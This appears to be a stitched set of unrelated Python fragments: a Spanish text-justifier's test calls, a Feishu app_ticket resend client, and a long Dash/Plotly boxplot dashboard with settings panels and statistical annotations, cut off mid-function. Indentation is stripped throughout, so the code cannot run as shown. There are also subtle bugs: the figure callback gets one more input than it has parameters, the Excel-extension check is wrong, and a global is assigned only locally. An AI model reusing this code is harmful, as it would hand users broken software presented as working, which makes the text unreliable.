justficador("Esta es una cadena de texto de ejemplo de unos 60 caracteres")
# justficador("Cadenita de tan sólo 32 símbolos")
# justficador('hola')
#justficador('Cadena de tan sólo 30 símbolos') |
# -*- coding: utf-8 -*-
from .basetoken import BaseToken
class AppTicket(BaseToken):
def __init__(self, appid=None, secret=None):
super(AppTicket, self).__init__(appid=appid, secret=secret)
# 重新推送 app_ticket, Refer: https://open.feishu.cn/document/ukTMukTMukTM/uQjNz4CN2MjL0YzM
self.APP_TICKET_RESEND = self.OPEN_DOMAIN + '/open-apis/auth/v3/app_ticket/resend/'
def resend(self, appid=None, secret=None):
return self.post(self.APP_TICKET_RESEND, data={
'app_id': appid or self.appid,
'app_secret': secret or self.secret,
})
app_ticket = AppTicket()
app_ticket_resend = app_ticket.resend
|
# IMPORT LIBRARIES
import plotly.graph_objs as go
import dash
import dash_bootstrap_components as dbc
import dash_html_components as html
import dash_core_components as dcc
import dash_daq as daq
from dash.dependencies import Input, Output, State
import pandas as pd
import numpy as np
import colorlover as cl
# INITIAL VARIABLES
button_font_size='1.2em'
cardbody_font_size='1em'
cardheader_color='info'
cardbody_color='info'
main_panel_margin={'margin': '10px 0px'}
left_panel_margin={'width': '25%'}
right_panel_margin={'class': 'col-md-8', 'display':'block-inline'}
toggle_switch_color='#91c153'
line_style = ['Solid', 'Dash', 'Dot', 'Long Dash', 'Dash Dot', 'Long Dash Dot']
marker_symbols = ['Circle', 'Square', 'Diamond', 'Cross', 'X', 'Triangle-Up', 'Pentagon', 'Hexagon', 'Star']
default_alpha = 0.65
default_symbol_alpha = 1
box_color_saved = {}
percentile_color_saved = cl.to_rgb(cl.scales[str('5')]['qual']['Dark2'])
num_of_color=9
default_color = cl.to_rgb(cl.scales[str(num_of_color)]['qual']['Set1'])
dtick_value = None
# Initialising selected marker symbol
selected_marker_symbols = ['diamond', 'cross', 'triangle-up', 'star', 'x']
# generate default colors list
col_idx = 0
for i in default_color:
start_idx = i.find('(')
i = i[start_idx+1:len(i)-1]
i = i.split(",")
i = 'rgba({},{},{},{})'.format(i[0], i[1], i[2], default_alpha)
default_color[col_idx] = i
col_idx += 1
col_idx = 0
for i in percentile_color_saved:
start_idx = i.find('(')
i = i[start_idx+1:len(i)-1]
i = i.split(",")
i = 'rgba({},{},{},{})'.format(i[0], i[1], i[2], default_symbol_alpha)
percentile_color_saved[col_idx] = i
col_idx += 1
# FUNCTIONS GOES HERE
# Function: Reading file
# Input: file name
# Output: data frame
def read_file(filename):
try:
if 'csv' in filename:
dff = pd.read_csv(filename)
elif ('xls' or 'xlsx') in filename:
dff = pd.read_excel(filename)
except Exception as e:
print(e)
return u'There was an error opening {}'.format(filename)
return dff
# Function: Render drop down list
# Input: id, [options]
# Output: dcc.Dropdown
def render_dropdown(id, options):
return dcc.Dropdown(id=id, options=[{'label': i, 'value': i} for i in options],
className='card h-100' )
# Function: Render drop down list without any options
# Input: id
# Output: dcc.Dropdown
def render_dropdown_blank(id):
return dcc.Dropdown(id=id)
# Function: Render drop down list with selected value
# Input: id, [options], value
# Output: dcc.Dropdown
def render_dropdown_valued(id, options, value):
return dcc.Dropdown(id=id, options=[{'label': i, 'value': i} for i in options], value=value,
className='card h-100' )
# Function: Render drop down list with label formatting (remove space between words and turn to lower case)
# Input: id, [options]
# Output: dcc.Dropdown
def render_dropdown_format(id, options):
return dcc.Dropdown(id=id, options=[{'label': i, 'value': (i.replace(" ", "")).lower()} for i in options],
className='card h-100' )
# Function: Render radio items
# Input: id, [options]
# Output: dcc.RadioItems
def render_radio(id, options):
return dcc.RadioItems(id=id, options=[{'label': i, 'value': i} for i in options],
value=str(options[0]), labelStyle={'display': 'block'} )
# Function: Render radio items for data points and outlies
# Input: id
# Output: dcc.RadioItems
def render_radio_outliers(id):
return dcc.RadioItems(
id=id,
options=[
{'label': 'Default', 'value': 'outliers'},
{'label': 'Only Wiskers', 'value': 'False'},
{'label': 'Suspected Outliers', 'value': 'suspectedoutliers'},
{'label': 'All Points', 'value': 'all'},
],
value='outliers',
labelStyle={'display': 'block'} )
# Function: Render radio items contain id only
# Input: id
# Output: dcc.RadioItems
def render_radio_blank(id):
return dcc.RadioItems(id=id, labelStyle={'display': 'block'} )
# Function: Render radio items with label formatting (remove space between words and turn to lower case)
# Input: id, [options]
# Output: dcc.RadioItems
def render_radio_format(id, options):
return dcc.RadioItems(
id=id,
options=[{'label': i, 'value': (i.replace(" ", "")).lower()} for i in options],
value=(str(options[0]).replace(" ", "")).lower(),
labelStyle={'display': 'block'}, )
# Function: Render text input
# Input: id, placeholder
# Output: dcc.Input
def render_input(id, placeholder):
return dcc.Input(id=id, type='text', placeholder=placeholder, style={'width': '100%'})
# Function: Render number input
# Input: id, placeholder
# Output: dcc.Input
def render_input_number(id, placeholder):
return dcc.Input(id=id, type='number', min=0, placeholder=placeholder, style={'width': '100%'})
# Function: Render text input with delay feature, will callback after enter key pressed or input area loss its focus
# Input: id, placeholder
# Output: dcc.RadioItems
def render_input_delay(id, placeholder):
return dcc.Input(id=id, type='text', placeholder=placeholder, debounce=True, style={'width': '100%'})
# Function: Render toggle switch
# Input: id, [labels], value
# Output: daq.ToggleSwitch
def render_toggleswitch(id, labels, value):
return daq.ToggleSwitch(id=id, label=labels, value=value, color=toggle_switch_color, )
# Function: Render boolean switch
# Input: id, label, on
# Output: daq.BooleanSwitch
def render_booleanswitch(id, label, on):
return daq.BooleanSwitch(id=id, label=label, on=on, labelPosition='top', color=toggle_switch_color, )
# Function: Render boolean switch without label
# Input: id, on
# Output: daq.BooleanSwitch
def render_booleanswitch_nolab(id, on):
return daq.BooleanSwitch(id=id, on=on, color=toggle_switch_color, )
# Function: Render slider
# Input: id, min, max, value, step, label
# Output: daq.Slider
def render_slider(id, min, max, value, step, marks):
mymark={}
for i in marks:
mymark[i]=str(i)
return daq.Slider(id=id, min=min, max=max, value=value, step=step, marks=mymark )
# Function: Render Range slider
# Input: id, min, max, [value], step, {marks}
# Output: dcc.RangeSlider
def render_range_slider(id, min, max, value, step, marks):
return dcc.RangeSlider(id=id, min=min, max=max, value=value, step=step, marks=marks )
# Function: Render color picker
# Input: id, min, max, value, step, label
# Output: daq.ColorPicker
def render_colorpicker(id, color, r, g, b, a):
value=dict(rgb=dict(r=r, g=g, b=b, a=a))
return daq.ColorPicker(id=id, value=value)
# Function: Render numeric Input
# Input: id, min, max, value
# Output: daq.NumericInput
def render_numinput(id, min, max, value):
return daq.NumericInput(id=id, min=min, max=max, value=value )
# MAIN APP HERE
# Loading Data
file_name = 'data3.xlsx'
df = read_file(file_name)
# Loading Numeric Data from Dataframe
# Please be aware with categoric data stored in numeric data
# example: gender variable coded by 1 and 2, this feature will
# fall into numeric data instead of categoric.
# proposed solution: modify file by recode to alphabetic
# (ex: recode 1 = m and 2 = f)
features = df.select_dtypes(include='number').columns.values
# Loading non-Numeric Data from Dataframe
cat_features = df.select_dtypes(exclude=['number', 'datetime', 'datetime64']).columns.values
# Loading datetime from Dataframe
datetime_feature = df.select_dtypes(include=['datetime', 'datetime64']).columns.values
if datetime_feature.shape[0]==0:
df_no_time=True
else:
print('have a time')
df_no_time=False
dt_min=df[datetime_feature[0]].min()
dt_max=df[datetime_feature[0]].max()
dt_range=((dt_max.year + 1) - dt_min.year)*12
# Generate date time slider marks
dt_slider_marks = {}
for i in range(0, dt_range+1):
if i % 12 == 0:
dt_slider_marks[i]=str(dt_min.year + (i//12))
## MAIN APP HERE
app = dash.Dash(__name__)
app.layout=html.Div(className='row', children=[
html.Div(children=[
html.Div(className='container', children=[
html.Div(className='accordion', children=[
dbc.Card([
dbc.CardHeader(
dbc.Button("Select Data", id='group-1-toggle', color=cardheader_color, style={'font-size': button_font_size}, block=True,
)
),
dbc.Collapse(
dbc.CardBody(children=[
dbc.Card([
dbc.CardHeader(html.H5('Variable')),
dbc.CardBody(children=render_dropdown_valued('select-variable', features, features[0]))
], className='col-md-6', style={'margin': '0px 0px 10px 0px', 'height': '30em'}
),
dbc.Card([
dbc.CardHeader(html.H5('Group by')),
dbc.CardBody(children=render_dropdown_valued('select-groupby', cat_features, cat_features[0]))
], className='col-md-6', style={'margin': '0px 0px 10px 0px', 'height': '30em'}
)
]),
id='collapse-1'
),
], color=cardbody_color, outline=True, style={'font-size': cardbody_font_size} ),
dbc.Card([
dbc.CardHeader(
dbc.Button(
"Plot Setting", id='group-3-toggle', color=cardheader_color, style={'font-size': button_font_size}, block=True,
)
),
dbc.Collapse(
dbc.CardBody(children=[
dbc.Card([
dbc.CardHeader(html.H5('Graph Orientation')),
dbc.CardBody(children=render_toggleswitch('graph-alignment', ['Vertical', 'Horizontal'], False))
], style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Legend')),
dbc.CardBody(children=render_booleanswitch_nolab('show-legend', True))
], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Grid Lines')),
dbc.CardBody(children=render_booleanswitch_nolab('show-gridlines', True))
], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('X Zero Line')),
dbc.CardBody(children=render_booleanswitch_nolab('show-zeroline-x', True))
], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Y Zero Line')),
dbc.CardBody(children=render_booleanswitch_nolab('show-zeroline-y', True))
], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Grid Width')),
dbc.CardBody(children=render_numinput('grid-width', 1, 5, 1))
], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Tick Step')),
dbc.CardBody(children=render_input_number('delta-tick', 'Tick Step'))
], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
),
]),
id='collapse-3'
),
], color='info', outline=True, style={'font-size': cardbody_font_size} ),
dbc.Card([
dbc.CardHeader(
dbc.Button(
"Statistic Information", id='group-4-toggle', color=cardheader_color, style={'font-size': button_font_size}, block=True,
)
),
dbc.Collapse(
dbc.CardBody(children=[
dbc.Card([
dbc.CardHeader(html.H5('Data Transformation')),
dbc.CardBody(children=render_toggleswitch('data-transform', ['Linear', 'Logarithmic'], False))
], style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Boxplot type')),
dbc.CardBody(children=render_radio_outliers('select-outliers'))
], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Frequency')),
dbc.CardBody(children=render_booleanswitch_nolab('show-ndata', True))
], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Mean')),
dbc.CardBody(children=render_booleanswitch_nolab('show-mean', False))
], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Std. Dev.')),
dbc.CardBody(children=render_booleanswitch_nolab('show-sd', False))
], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Summary Stats')),
dbc.CardBody(children=render_booleanswitch_nolab('show-stats', False))
], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
),
]),
id='collapse-4'
),
], color=cardbody_color, outline=True, style={'font-size': cardbody_font_size} ),
dbc.Card([
dbc.CardHeader(
dbc.Button(
"Percentiles", id='group-7-toggle', color=cardheader_color, style={'font-size': button_font_size}, block=True,
)
),
dbc.Collapse(
dbc.CardBody(children=[
dbc.Card([
dbc.CardHeader(html.H5('Show Percentiles')),
dbc.CardBody(children=render_booleanswitch_nolab('show-percentiles', False))
], style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Percentile')),
dbc.CardBody(children=render_dropdown('select-percentile', ['5%', '10%', '90%', '95%']))
], style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Marker Symbol')),
dbc.CardBody(children=render_dropdown_format('marker-symbol', marker_symbols))
], style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Symbol Size'), className='card w-100'),
dbc.CardBody(children=render_numinput('symbol-size', 1, 15, 8))
], style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Color')),
dbc.CardBody(children=render_colorpicker('select-percentile-color', 'white', 100, 200, 255, 0.65))
],
),
]),
id='collapse-7'
),
], color=cardbody_color, outline=True, style={'font-size': cardbody_font_size} ),
dbc.Card([
dbc.CardHeader(
dbc.Button(
"Threshold Setting", id='group-5-toggle', color=cardheader_color, style={'font-size': button_font_size}, block=True,
)
),
dbc.Collapse(
dbc.CardBody(children=[
dbc.Card([
dbc.CardHeader(html.H5('Threshold')),
dbc.CardBody(children=render_booleanswitch_nolab('show-treshold', False))
], style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Value')),
dbc.CardBody(children=render_input('treshold-value', 'Threshold Value'))
], className='col-md-6'
),
dbc.Card([
dbc.CardHeader(html.H5('Line Size')),
dbc.CardBody(children=render_numinput('treshold-line-size', 1, 10, 2))
], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Line Style')),
dbc.CardBody(children=render_dropdown_format('treshold-style', line_style))
], style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Line Color')),
dbc.CardBody(children=render_colorpicker('treshold-line-color', 'white', 0, 0, 255, 1))
], style={'margin': '0px 0px 10px 0px'}
),
]),
id='collapse-5'
),
], color=cardbody_color, outline=True, style={'font-size': cardbody_font_size} ),
dbc.Card([
dbc.CardHeader(
dbc.Button(
"Box Color", id='group-6-toggle', color=cardheader_color, style={'font-size': button_font_size}, block=True,
)
),
dbc.Collapse(
dbc.CardBody(children=[
dbc.Card([
dbc.CardHeader(html.H5('Fill')),
dbc.CardBody(children=render_toggleswitch('box-color-fill', ['Transparent', 'Colored'], True))
], style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Select Box'), className='card w-100'),
dbc.CardBody(children=render_dropdown_blank('select-box'))
], style={'margin': '0px 0px 10px 0px'}
),
dbc.Card([
dbc.CardHeader(html.H5('Color')),
dbc.CardBody(children=render_colorpicker('box-color', 'white', 0, 0, 255, 0.65))
],
),
]),
id='collapse-6'
),
], color=cardbody_color, outline=True, style={'font-size': cardbody_font_size} ),
dbc.Card([
dbc.CardHeader(
dbc.Button("Graph Size", id='group-2-toggle', color=cardheader_color, style={'font-size': button_font_size}, block=True,
)
),
dbc.Collapse(
dbc.CardBody(children=[
dbc.Card([
dbc.CardHeader(html.H5('Graph Height')),
dbc.CardBody(children=render_slider('graph-height', 600, 1200, 600, 50, [600, 700, 800, 900, 1000, 1100, 1200]), style={'padding':'5% 5% 10% 5%'})
], style={'width': '100%'}
),
dbc.Card([
dbc.CardHeader(html.H5('Graph Width')),
dbc.CardBody(children=render_slider('graph-width', 800, 1400, 800, 50, [800, 900, 1000, 1100, 1200, 1300, 1400]), style={'padding':'5% 5% 10% 5%'})
], style={'width': '100%'}
),
]),
id='collapse-2'
),
], color=cardbody_color, outline=True, style={'font-size': cardbody_font_size} ),
])
])
], className='col-md-3'
),
html.Div(children=[
dbc.Row(children=[
dcc.Graph(id='box-plot',
style={'width' : '90%', 'padding-left' : '3%'},
config={'editable' : True, 'toImageButtonOptions': {'scale' : 10},'edits' : {'titleText': True}},
),
],
),
dbc.Row(children=[
html.Div(id='time-msg-card', children=[
dbc.Card([
dbc.CardHeader(html.H5('Select Time Range')),
dbc.CardBody(children=render_range_slider('time-range-slider', 0, 0 if df_no_time else dt_range, [0, 0 if df_no_time else dt_range], 1, {} if df_no_time else dt_slider_marks), style={'padding':'2% 2% 4% 2%'}),
dbc.CardFooter(id='time-range-msg'),
], style={'width': '100%', 'font-size': cardbody_font_size, 'display': 'none' if df_no_time else 'block'}, color=cardbody_color, outline=True,
),
], style={'width': '90%', 'margin': '2%'}
),
]),
], className='col-md-9'
),
], style=main_panel_margin)
# CALLBACK GOES HERE
# Accordion Toggle Callback
@app.callback(
[Output(f'collapse-{i}', 'is_open') for i in range(1,8)],
[Input(f'group-{i}-toggle', 'n_clicks') for i in range(1,8)],
[State(f'collapse-{i}', 'is_open') for i in range(1,8)]
)
def toggle_accordion(n1, n2, n3, n4, n5, n6, n7, is_open1, is_open2, is_open3, is_open4, is_open5, is_open6, is_open7):
ctx = dash.callback_context
if not ctx.triggered:
return ""
else:
button_id = ctx.triggered[0]['prop_id'].split('.')[0]
if button_id == 'group-1-toggle' and n1:
return not is_open1, False, False, False, False, False, False
elif button_id == 'group-2-toggle' and n2:
return False, not is_open2, False, False, False, False, False
elif button_id == 'group-3-toggle' and n3:
return False, False, not is_open3, False, False, False, False
elif button_id == 'group-4-toggle' and n4:
return False, False, False, not is_open4, False, False, False
elif button_id == 'group-5-toggle' and n5:
return False, False, False, False, not is_open5, False, False
elif button_id == 'group-6-toggle' and n6:
return False, False, False, False, False, not is_open6, False
elif button_id == 'group-7-toggle' and n7:
return False, False, False, False, False, False, not is_open7
return False, False, False, False, False, False, False
# Update time range message
@app.callback(
Output('time-range-msg', 'children'),
[Input('time-range-slider', 'value'), ]
)
def update_time_range_msg(dt_range_slider):
if not df_no_time:
from_year=dt_min.year+(dt_range_slider[0]//12)
from_month=dt_min.month+(dt_range_slider[0]%12)
to_year=dt_min.year+(dt_range_slider[1]//12)
to_month=dt_range_slider[1]%12+1
return html.H5('Time range from {}/{} to {}/{}'.format(from_month, from_year, to_month, to_year))
else:
return None
# Update marker symbol when percentile selected
@app.callback(
Output('marker-symbol', 'value'),
[Input('select-percentile', 'value')]
)
def update_marker_symbol(percentile):
i = 0
if percentile == '5%':
i = 0
elif percentile == '10%':
i = 1
elif percentile == '90%':
i = 2
else:
i = 3
return selected_marker_symbols[i]
# Update Percentile Symbol Color Picker
@app.callback(
Output('select-percentile-color', 'value'),
[Input('select-percentile', 'value')]
)
def update_box_color_selector(percentile):
i = 0
if percentile == '5%':
i = 0
elif percentile == '10%':
i = 1
elif percentile == '90%':
i = 2
else:
i = 3
temp_str = percentile_color_saved[i]
start_idx = temp_str.find('(')
temp_str = temp_str[start_idx+1:len(temp_str)-1]
temp_str = temp_str.split(",")
temp_str = dict(rgb=dict(r=temp_str[0], g=temp_str[1], b=temp_str[2], a=temp_str[3]))
return temp_str
# Turn Y Tick Disabled when in Logarithmic and Enabled when in Linear
# Turn Y Tick Value to None when in Logarithmic end recall previous value when turn back to Linear
@app.callback(
[Output('delta-tick', 'disabled'),
Output('delta-tick', 'value')],
[Input('data-transform', 'value')]
)
def update_delta_tick_disabled(is_log):
return is_log, None if is_log else dtick_value
# Box Color Selector Callback
@app.callback(
Output('box-color', 'value'),
[Input('select-box', 'value')]
)
def update_box_color_selector(box):
temp_str = box_color_saved.get(box, dict(rgb=dict(r=222, g=110, b=75, a=default_alpha)))
if isinstance(temp_str, str):
start_idx = temp_str.find('(')
temp_str = temp_str[start_idx+1:len(temp_str)-1]
temp_str = temp_str.split(",")
temp_str = dict(rgb=dict(r=temp_str[0], g=temp_str[1], b=temp_str[2], a=temp_str[3]))
return temp_str
# Box Selector Callback
@app.callback(
Output('select-box', 'options'),
[Input('select-groupby', 'value'), ]
)
def update_select_box(groupby):
idx = 0
for i in df[groupby].unique():
box_color_saved[i] = default_color[idx % num_of_color]
idx += 1
return [{'label': i, 'value': i} for i in df[groupby].unique()]
# Threshold Line Callback
@app.callback(
Output('treshold-value', 'value'),
[Input('show-treshold', 'on'),
Input('select-variable', 'value'),
]
)
def update_treshold_value(
is_tresholdshow, variable
):
return np.around(np.mean(df[variable]), 0) if is_tresholdshow else ' '
# Statistics Show Hide Callback
@app.callback(
Output('show-stats', 'on'),
[Input('select-outliers', 'value'), ]
)
def update_showstat(outliersshow):
return False if outliersshow == 'all' else None
# Figure Callback
@app.callback(
Output('box-plot', 'figure'),
[
Input('select-variable', 'value'), Input('select-groupby', 'value'),
Input('show-gridlines', 'on'),
Input('show-zeroline-x', 'on'), Input('show-zeroline-y', 'on'),
Input('show-legend', 'on'), Input('show-percentiles', 'on'),
Input('graph-alignment', 'value'), Input('data-transform', 'value'),
Input('select-outliers', 'value'), Input('show-ndata', 'on'),
Input('show-percentiles', 'on'), Input('show-mean', 'on'),
Input('show-sd', 'on'), Input('show-treshold', 'on'),
Input('treshold-value', 'value'), Input('treshold-style', 'value'),
Input('treshold-line-color', 'value'),
Input('treshold-line-size', 'value'),
Input('show-stats', 'on'), Input('graph-height', 'value'),
Input('graph-width', 'value'),
Input('select-box', 'value'), Input('box-color', 'value'),
Input('grid-width', 'value'), Input('delta-tick', 'value'),
Input('box-color-fill', 'value'),
Input('select-percentile', 'value'), Input('marker-symbol', 'value'),
Input('select-percentile-color', 'value'), Input('symbol-size', 'value'),
Input('time-range-slider', 'value'),
]
)
def update_figure(
variable, groupby,
gridshow, xzeroline, yzeroline, legendshow,
datapointsshow, is_vertical, is_log, outliersshow, is_ndatashow,
is_percentileshow, is_meanshow, is_sdshow, is_tresholdshow, treshold_value,
treshold_style, treshold_color, treshold_size, is_statshow, graph_height,
graph_width, selected_box, box_color, grid_width, dtick, is_color_filled,
select_percentile, marker_symbol, select_percentile_color, symbol_size
):
# Update dtick_value
if dtick != None:
dtick_value = dtick
# Title and axises label modificator
xaxis_title = groupby
yaxis_title = variable
main_title = str(variable + " VS " + groupby)
# Outliers Selector
showpoints = ""
if (outliersshow == 'False'):
showpoints = False
elif (outliersshow == 'suspectedoutliers'):
showpoints = outliersshow
else:
showpoints = outliersshow
# Initialising data list
group_list = df[groupby].unique()
data_list = []
n_data = []
data_mean = []
data_median = []
data_max = []
data_min = []
percentile_5 = []
percentile_10 = []
percentile_90 = []
percentile_95 = []
percentile_25 = []
percentile_75 = []
annots_ndata = []
annots_mean = []
annots_median = []
annots_max = []
annots_min = []
annots_p5 = []
annots_p10 = []
annots_p25 = []
annots_p75 = []
annots_p90 = []
annots_p95 = []
annots_idx = 0
# Computing N Data
max_n = df[variable].max()
max_n = 1.05*np.log10(max_n) if is_log else 1.05*max_n
picker_percentile_color = 'rgba({}, {}, {}, {})'.format(
select_percentile_color['rgb']['r'],
select_percentile_color['rgb']['g'],
select_percentile_color['rgb']['b'],
select_percentile_color['rgb']['a'],)
picker_box_color = 'rgba({}, {}, {}, {})'.format(
box_color['rgb']['r'],
box_color['rgb']['g'],
box_color['rgb']['b'],
box_color['rgb']['a'],)
color_idx = 0
# Generate boxplot
for i in group_list:
if selected_box is not None:
if i == selected_box:
box_color_saved[i] = picker_box_color
color_idx += 1
if (not is_vertical):
data_list.append(
go.Box(
y=df[df[groupby] == i][variable],
name=i,
boxpoints=showpoints,
boxmean='sd' if is_sdshow else None,
marker_color=box_color_saved[i],
fillcolor=box_color_saved[i] if is_color_filled else 'rgba(255,255,255,0)',
)
)
else:
data_list.append(
go.Box(
x=df[df[groupby] == i][variable],
name=i,
orientation='h',
boxpoints=showpoints,
boxmean='sd' if is_sdshow else None,
marker_color=box_color_saved[i],
fillcolor=box_color_saved[i] if is_color_filled else 'rgba(255,255,255,0)',
)
)
# Counting percentiles
percentile_5.append(np.around(np.percentile((df[df[groupby] == i][variable]), 5), 2))
percentile_10.append(np.around(np.percentile((df[df[groupby] == i][variable]), 10), 2))
percentile_90.append(np.around(np.percentile((df[df[groupby] == i][variable]), 90), 2))
percentile_95.append(np.around(np.percentile((df[df[groupby] == i][variable]), 95), 2))
percentile_25.append(np.around(np.percentile((df[df[groupby] == i][variable]), 25), 2))
percentile_75.append(np.around(np.percentile((df[df[groupby] == i][variable]), 75), 2))
data_max.append(np.around(np.max((df[df[groupby] == i][variable])), 2))
data_min.append(np.around(np.min((df[df[groupby] == i][variable])), 2))
# Calculating mean and median
data_mean.append(np.around(np.mean((df[df[groupby] == i][variable])), 2))
data_median.append(np.around(np.median((df[df[groupby] == i][variable])), 2))
# Counting number of data for each category
df_shape = df[df[groupby] == i][variable].shape
n_data.append(df_shape[0])
# Generating annotations of n of data
annots_ndata.append(go.layout.Annotation(
x=max_n if is_vertical else annots_idx,
y=annots_idx if is_vertical else max_n,
xref='x',
yref='y',
text='N = {}'.format(n_data[annots_idx]),
showarrow=False,
ax=0 if is_vertical else annots_idx,
ay=annots_idx if is_vertical else 0,
)
)
# Generating annotations of mean
annots_mean.append(go.layout.Annotation(
x=(np.log10(data_mean[annots_idx]) if is_log else data_mean[annots_idx]) if is_vertical else annots_idx,
y=annots_idx if is_vertical else (np.log10(data_mean[annots_idx]) if is_log else data_mean[annots_idx]),
xref='x',
yref='y',
text='Mean: {}'.format(data_mean[annots_idx]),
showarrow=True,
ax=0 if is_vertical else (100/len(group_list))*5,
ay=(100/len(group_list))*2 if is_vertical else 0,
arrowhead=7,
))
# Generating annotations of mean
annots_median.append(go.layout.Annotation(
x=(np.log10(data_median[annots_idx]) if is_log else data_median[annots_idx]) if is_vertical else annots_idx,
y=annots_idx if is_vertical else (np.log10(data_median[annots_idx]) if is_log else data_median[annots_idx]),
xref='x',
yref='y',
text='Med: {}'.format(data_median[annots_idx]),
showarrow=True,
ax=0 if is_vertical else (-100/len(group_list))*4,
ay=(-100/len(group_list))*2 if is_vertical else 0,
arrowhead=7,
))
# Generating annotations of percentile 5
annots_p5.append(go.layout.Annotation(
x=(np.log10(percentile_5[annots_idx]) if is_log else percentile_5[annots_idx]) if is_vertical else annots_idx,
y=annots_idx if is_vertical else (np.log10(percentile_5[annots_idx]) if is_log else percentile_5[annots_idx]),
xref='x',
yref='y',
text='P5: {}'.format(percentile_5[annots_idx]),
showarrow=True,
ax=0 if is_vertical else (-100/len(group_list))*4,
ay=(-100/len(group_list))*2 if is_vertical else 0,
arrowhead=7,
))
# Generating annotations of percentile 10
annots_p10.append(go.layout.Annotation(
x=(np.log10(percentile_10[annots_idx]) if is_log else percentile_10[annots_idx]) if is_vertical else annots_idx,
y=annots_idx if is_vertical else (np.log10(percentile_10[annots_idx]) if is_log else percentile_10[annots_idx]),
xref='x',
yref='y',
text='P10: {}'.format(percentile_10[annots_idx]),
showarrow=True,
ax=0 if is_vertical else (100/len(group_list))*5,
ay=(100/len(group_list))*2 if is_vertical else 0,
arrowhead=7,
))
# Generating annotations of percentile 25
annots_p25.append(go.layout.Annotation(
x=(np.log10(percentile_25[annots_idx]) if is_log else percentile_25[annots_idx]) if is_vertical else annots_idx,
y=annots_idx if is_vertical else (np.log10(percentile_25[annots_idx]) if is_log else percentile_25[annots_idx]),
xref='x',
yref='y',
text='Q1: {}'.format(np.around(percentile_25[annots_idx], 2)),
showarrow=True,
ax=0 if is_vertical else (-100/len(group_list))*4,
ay=(-100/len(group_list))*2 if is_vertical else 0,
arrowhead=7,
))
# Generating annotations of percentile 75
annots_p75.append(go.layout.Annotation(
x=(np.log10(percentile_75[annots_idx]) if is_log else percentile_75[annots_idx]) if is_vertical else annots_idx,
y=annots_idx if is_vertical else (np.log10(percentile_75[annots_idx]) if is_log else percentile_75[annots_idx]),
xref='x',
yref='y',
text='Q3: {}'.format(np.around(percentile_75[annots_idx], 2)),
showarrow=True,
ax=0 if is_vertical else (100/len(group_list))*5,
ay=(100/len(group_list))*2 if is_vertical else 0,
arrowhead=7,
))
# Generating annotations of percentile 90
annots_p90.append(go.layout.Annotation(
x=(np.log10(percentile_90[annots_idx]) if is_log else percentile_90[annots_idx]) if is_vertical else annots_idx,
y=annots_idx if is_vertical else (np.log10(percentile_90[annots_idx]) if is_log else percentile_90[annots_idx]),
xref='x',
yref='y',
text='P90: {}'.format(percentile_90[annots_idx]),
showarrow=True,
ax=0 if is_vertical else (-100/len(group_list))*4,
ay=(-100/len(group_list))*2 if is_vertical else 0,
arrowhead=7,
))
# Generating annotations of percentile 95
annots_p95.append(go.layout.Annotation(
x=(np.log10(percentile_95[annots_idx]) if is_log else percentile_95[annots_idx]) if is_vertical else annots_idx,
y=annots_idx if is_vertical else (np.log10(percentile_95[annots_idx]) if is_log else percentile_95[annots_idx]),
xref='x',
yref='y',
text='P95: {}'.format(percentile_95[annots_idx]),
showarrow=True,
ax=0 if is_vertical else (100/len(group_list))*5,
ay=(100/len(group_list))*2 if is_vertical else 0,
arrowhead=7,
))
# Generating annotations of max
annots_max.append(go.layout.Annotation(
x=(np.log10(data_max[annots_idx]) if is_log else data_max[annots_idx]) if is_vertical else annots_idx,
y=annots_idx if is_vertical else (np.log10(data_max[annots_idx]) if is_log else data_max[annots_idx]),
xref='x',
yref='y',
text='Max: {}'.format(data_max[annots_idx]),
showarrow=True,
ax=0 if is_vertical else (-100/len(group_list))*4,
ay=(-100/len(group_list))*2 if is_vertical else 0,
arrowhead=7,
))
annots_min.append(go.layout.Annotation(
x=(np.log10(data_min[annots_idx]) if is_log else data_min[annots_idx]) if is_vertical else annots_idx,
y=annots_idx if is_vertical else (np.log10(data_min[annots_idx]) if is_log else data_min[annots_idx]),
xref='x',
yref='y',
text='Min: {}'.format(data_min[annots_idx]),
showarrow=True,
ax=0 if is_vertical else (100/len(group_list))*5,
ay=(100/len(group_list))*2 if is_vertical else 0,
arrowhead=7,
))
annots_idx = annots_idx + 1
if (not is_ndatashow):
annots_ndata = []
if (not is_statshow):
annots_mean = []
annots_median = []
annots_p5 = []
annots_p10 = []
annots_p25 = []
annots_p90 = []
annots_p75 = []
annots_p95 = []
annots_max = []
annots_min = []
annots_ndata = annots_ndata + annots_mean + annots_median + annots_p5 + annots_p10 + annots_p25 + annots_p75 + annots_p90 + annots_p95 + annots_max + annots_min
# Convert selected percentile values
ip = 0
if select_percentile == '5%':
ip = 0
